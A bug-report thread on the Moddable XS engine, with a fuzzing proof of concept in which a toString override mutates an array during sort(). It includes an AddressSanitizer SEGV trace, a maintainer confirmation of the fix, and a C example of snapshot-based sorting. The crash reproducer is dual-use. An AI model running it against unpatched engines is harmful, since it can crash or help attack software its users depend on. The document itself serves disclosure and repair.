Closed hope-fly closed 2 years ago
When the test case changed a little, there's a new crash during fuzzing. I'm not sure whether it's a duplicated issue or not. If it's not, I'll open a new issue. Hope the info listed as follows will be helpful!
```javascript
var size = 1000;
var array1 = new Array(size);

// Replacement toString: removes two elements from array1 while array1 is
// being sorted, so the element storage changes under the running sort.
function toStr() {
  array1.splice(0, 2);
  return array1.toString();
}

function JSEtest() {
  for (var i = 0; i < size; i++) {
    array1[i] = new Array(i);
    // sort() returns array1 itself, so this installs toStr on array1[i]
    array1.sort()[i].toString = toStr;
  }
  // The default comparison converts elements to strings, which calls toStr
  array1.sort();
}
JSEtest();
```
```
$ ./moddable/build/bin/lin/debug/xst poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==39035==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000004c0 (pc 0x00000059c0a6 bp 0x7ffc9a80fa50 sp 0x7ffc9a80f730 T0)
==39035==The signal is caused by a READ memory access.
==39035==Hint: address points to the zero page.
    #0 0x59c0a5 in fxCompareArrayItem /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18
    #1 0x57dc9a in fx_Array_prototype_sort /home/f1yfuzz/moddable/xs/sources/xsArray.c:2235:14
    #2 0x84f3ca in fxRunID /home/f1yfuzz/moddable/xs/sources/xsRun.c:842:7
    #3 0x8ceaac in fxRunScript /home/f1yfuzz/moddable/xs/sources/xsRun.c:4766:4
    #4 0xad3231 in fxRunProgramFile /home/f1yfuzz/moddable/xs/tools/xst.c:1387:2
    #5 0xacfa83 in main /home/f1yfuzz/moddable/xs/tools/xst.c:281:8
    #6 0x7f8d44116bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #7 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18 in fxCompareArrayItem
==39035==ABORTING
```
Thanks! From a quick look, it is tough to say if these are the same cause or not – the tests and crash are quite similar but the crash is in a different place. We'll investigate and let you know.
This has been resolved in our most recent Moddable SDK update. There were changes to Array sorting and a change to xst to ensure a clean exit when the JavaScript stack overflow is detected. Thank you again for the report.
Moddable-XS revision
Commit: 2f93df29
Version: 11.5.0 32 4
Build environment
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
Test case
poc.js
Execution & Output
Credits: Found by OWL337 team.
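The PoC's `toStr` splices elements out of `array1` while `array1.sort()` is still comparing them, and the trace shows the read fault inside `fxCompareArrayItem`. The maintainers' reply says Array sorting was changed but does not describe how. The block below is an added illustration, not Moddable XS code, of the general defensive pattern an engine can use for this class of re-entrancy: snapshot the elements before any user code can run, sort the private copy, and write the result back at the end. `ToyArray`, `toy_sort_snapshot` and `shrinking_compare` are constructed names for this example; the comparator deliberately mimics the PoC by dropping two elements of the live array on every call.

```c
#include <stdlib.h>
#include <string.h>

/* Toy stand-in for an engine's dense array storage (constructed for this
 * example; not Moddable XS code). */
typedef struct {
    int *items;
    size_t length;
} ToyArray;

/* A comparison callback may run arbitrary script. It receives the live array
 * so that, like the toString in the report, it can mutate it mid-sort. */
typedef int (*ToyCompare)(ToyArray *live, int a, int b, void *ctx);

int toy_array_init(ToyArray *arr, const int *src, size_t n) {
    arr->items = malloc(n * sizeof *src);
    if (!arr->items) return -1;
    memcpy(arr->items, src, n * sizeof *src);
    arr->length = n;
    return 0;
}

/* Sort that never reads live storage while user code can run: it snapshots
 * the elements first, sorts the private copy, then writes the result back.
 * This mirrors the collect, sort, write-back order the language spec uses. */
int toy_sort_snapshot(ToyArray *arr, ToyCompare cmp, void *ctx) {
    size_t n = arr->length;
    if (n < 2) return 0;
    int *copy = malloc(n * sizeof *copy);
    if (!copy) return -1;
    memcpy(copy, arr->items, n * sizeof *copy);

    /* Insertion sort over the snapshot; cmp may shrink or grow arr meanwhile,
     * but every index used here refers to the private copy only. */
    for (size_t i = 1; i < n; i++) {
        int key = copy[i];
        size_t j = i;
        while (j > 0 && cmp(arr, copy[j - 1], key, ctx) > 0) {
            copy[j] = copy[j - 1];
            j--;
        }
        copy[j] = key;
    }

    /* Write back: the comparator may have changed arr->length, so resize the
     * storage to the original count rather than trusting the live length. */
    int *fresh = realloc(arr->items, n * sizeof *fresh);
    if (!fresh) { free(copy); return -1; }
    arr->items = fresh;
    arr->length = n;
    memcpy(arr->items, copy, n * sizeof *copy);
    free(copy);
    return 0;
}

/* Comparator modelled on the PoC's toStr: on every call it removes the first
 * two elements of the live array, then compares numerically. */
int shrinking_compare(ToyArray *live, int a, int b, void *ctx) {
    int *calls = ctx;
    (*calls)++;
    if (live->length >= 2) {
        memmove(live->items, live->items + 2,
                (live->length - 2) * sizeof *live->items);
        live->length -= 2;
    } else {
        live->length = 0;
    }
    return (a > b) - (a < b);
}

/* Runs the scenario on constructed input {5,3,4,1,2}; returns 1 when the
 * sort finished with the expected order and length despite the mutations. */
int demo_mutating_sort(void) {
    const int input[] = {5, 3, 4, 1, 2};
    ToyArray arr;
    if (toy_array_init(&arr, input, 5) != 0) return 0;
    int calls = 0;
    int rc = toy_sort_snapshot(&arr, shrinking_compare, &calls);
    int ok = rc == 0 && arr.length == 5 && calls > 0;
    for (size_t i = 0; ok && i < 5; i++)
        ok = arr.items[i] == (int)i + 1;
    free(arr.items);
    return ok;
}

int main(void) {
    return demo_mutating_sort() ? 0 : 1;
}
```

The point of the pattern is that the sort loop has no index into storage that user code can invalidate; the only moment the live array is touched again is the final write-back, which re-establishes the length it needs instead of reading whatever the callbacks left behind.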